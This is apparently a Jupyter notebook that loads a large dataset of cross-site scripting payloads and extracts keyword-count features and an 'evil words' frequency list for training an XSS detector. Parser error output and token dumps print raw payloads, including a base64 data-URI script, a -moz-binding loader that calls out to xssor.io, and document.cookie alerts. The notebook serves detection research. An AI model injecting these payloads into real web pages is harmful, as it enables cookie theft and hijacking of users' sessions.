In [2]:
import graphlab as gl

In [23]:
black = gl.SFrame.read_csv('data/xssed.csv').append(gl.SFrame.read_csv('data/xss_black_cos.csv'))

Finished parsing file /Users/xy/workspace/ML/DL_for_xss/data/xssed.csv

Parsing completed. Parsed 100 lines in 0.06911 secs.

------------------------------------------------------
Inferred types from first 100 line(s) of file as 
column_type_hints=[str]
If parsing fails due to incorrect types, you can correct
the inferred type list above and pass it to read_csv in
the column_type_hints argument
------------------------------------------------------


Finished parsing file /Users/xy/workspace/ML/DL_for_xss/data/xssed.csv

Parsing completed. Parsed 40637 lines in 0.093406 secs.

...

Unable to parse line "<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">"

Unable to parse line "<div style="-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99..."

5 lines failed to parse correctly

Finished parsing file /Users/xy/workspace/ML/DL_for_xss/data/xss_black_cos.csv

Parsing completed. Parsed 14 lines in 0.010985 secs.

In [24]:
black

Columns:
	param	str

Rows: 40651

Data:
+-------------------------------+
|             param             |
+-------------------------------+
| Search%3D%3C/script%3E%3Ci... |
| symbol%3D%3Ch1%3E%3Cscript... |
| query%3D%3CIMG%2B%22%22%22... |
| ReturnUrl%3Dhttp%3A//www.e... |
| _lang%3D%22%3E%3Cscript%3E... |
| language%3D%22%3E%3C/scrip... |
| q%3Dbentley%26stylesheet%3... |
| option%3Dcom_wdshop%26view... |
| CT_ORIG_URL%3D/arena/%22%3... |
| query%3DSearch...%26Produc... |
+-------------------------------+
[40651 rows x 1 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.

In [40]:
import nltk
import re
from urllib import unquote

def GeneSeg(payload):
    #数字泛化为"0"
    payload=payload['param'].lower()
    payload=unquote(unquote(payload))
    payload,num=re.subn(r'\d+',"[NUMBER]",payload)
    #替换url为”http://u
    payload,num=re.subn(r'(http|https)://[a-zA-Z0-9\.@&/#!#\?]+', "[LINK]", payload)
    #分词
    ans = [ 
        len(re.findall('>',payload)),
        len(re.findall('<',payload)),
        len(re.findall('script',payload)),
        len(re.findall('svg',payload)),
        len(re.findall('onload',payload)),
        len(re.findall('onerror',payload)),
        len(re.findall('cookie',payload)),
        len(re.findall('alert',payload)),
        len(re.findall('\(',payload)),
        len(re.findall('\)',payload)),
        len(re.findall('\"',payload)),
        len(re.findall('\'',payload)),
        len(re.findall('=',payload)),
        len(re.findall('[NUMBER]',payload)),
        len(re.findall('[LINK]',payload)),
        len(re.findall(':',payload))
    ]
    return ans

In [41]:
# 增加一列
black['parsed'] = black.apply(GeneSeg)

In [42]:
black

Columns:
	param	str
	parsed	array

Rows: 40651

Data:
+-------------------------------+-------------------------------+
|             param             |             parsed            |
+-------------------------------+-------------------------------+
| Search%3D%3C/script%3E%3Ci... | [2.0, 2.0, 1.0, 0.0, 0.0, ... |
| symbol%3D%3Ch1%3E%3Cscript... | [4.0, 4.0, 2.0, 0.0, 0.0, ... |
| query%3D%3CIMG%2B%22%22%22... | [4.0, 3.0, 2.0, 0.0, 0.0, ... |
| ReturnUrl%3Dhttp%3A//www.e... | [3.0, 2.0, 2.0, 0.0, 0.0, ... |
| _lang%3D%22%3E%3Cscript%3E... | [3.0, 2.0, 2.0, 0.0, 0.0, ... |
| language%3D%22%3E%3C/scrip... | [6.0, 3.0, 3.0, 0.0, 0.0, ... |
| q%3Dbentley%26stylesheet%3... | [3.0, 2.0, 2.0, 0.0, 0.0, ... |
| option%3Dcom_wdshop%26view... | [5.0, 4.0, 3.0, 0.0, 0.0, ... |
| CT_ORIG_URL%3D/arena/%22%3... | [5.0, 4.0, 2.0, 0.0, 0.0, ... |
| query%3DSearch...%26Produc... | [5.0, 4.0, 3.0, 0.0, 0.0, ... |
+-------------------------------+-------------------------------+
[40651 rows x 2 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.

In [28]:
# 取词的全集生成新的SFrame
ans = []
black['parsed'].apply(lambda x:[ans.append(i) for i in x])
print ans

['search=', '</script>', '<img', 'src=', 'worksinchrome', 'colon', 'prompt', 'x0', '0', 'x0', 'onerror=', 'eval(', 'src', ')', '>', 'symbol=', '<h0>', '<script>', 'alert(', 'hacked', ')', '</script>', '</h0>', 'id=', '0', 'query=', '<img', '>', '<script>', 'alert(', '"cyb0r_pr0dat0r"', ')', '</script>', '>', 'fuzzy=', 'true', 'ct=', 'null', 'autobounce=', 'true', 'returnurl=', 'http://u', 'globale', 'searchtext', ')', '>', '<script>', 'alert(', 'xss', 'by', 'm0ke', ')', '</script>', '_lang=', '>', '<script>', 'alert(', 'document.cookie', ')', '</script>', 'language=', '>', '</script>', '>', '>', '<script>', 'alert(', 'arman', 'ires', 'digital', 'boys', 'underground', 'http://u', ')', '</script>', 'q=', 'bentley', 'stylesheet=', '>', '<script>', 'alert(', "'raven'", ')', '</script>', 'collections=', 'libcms', 'option=', 'com_wdshop', 'view=', 'userinfo', 'ajax_json=', 'ajax_fill_city_state', 'format=', 'raw', 'zip=', '>', '</style>', '</script>', '<script>', 'alert(', 'document.cookie',

In [29]:
evil_word_frame = gl.SFrame(data=ans)

In [30]:
evil_word_frame

Columns:
	X1	str

Rows: 1595

Data:
+---------------+
|       X1      |
+---------------+
|    search=    |
|   </script>   |
|      <img     |
|      src=     |
| worksinchrome |
|     colon     |
|     prompt    |
|       x0      |
|       0       |
|       x0      |
+---------------+
[1595 rows x 1 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.

In [31]:
evil_word_frame['count'] = evil_word_frame.apply(lambda x:len(evil_word_frame.filter_by(x['X1'],'X1')))

In [32]:
evil_word_frame = evil_word_frame.unique().sort('count',ascending=False)

In [33]:
evil_word_frame

Columns:
	X1	str
	count	int

Rows: 330

Data:
+----------------------+-------+
|          X1          | count |
+----------------------+-------+
|          0           |  491  |
|          )           |  155  |
|          >           |  120  |
|        alert(        |  113  |
|      </script>       |   99  |
|       <script>       |   83  |
| string.fromcharcode( |   37  |
|       http://u       |   15  |
|   document.cookie    |   15  |
|         xss          |   10  |
+----------------------+-------+
[330 rows x 2 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.

In [34]:
evil_word_frame['X1'].save('evil_words_1.csv')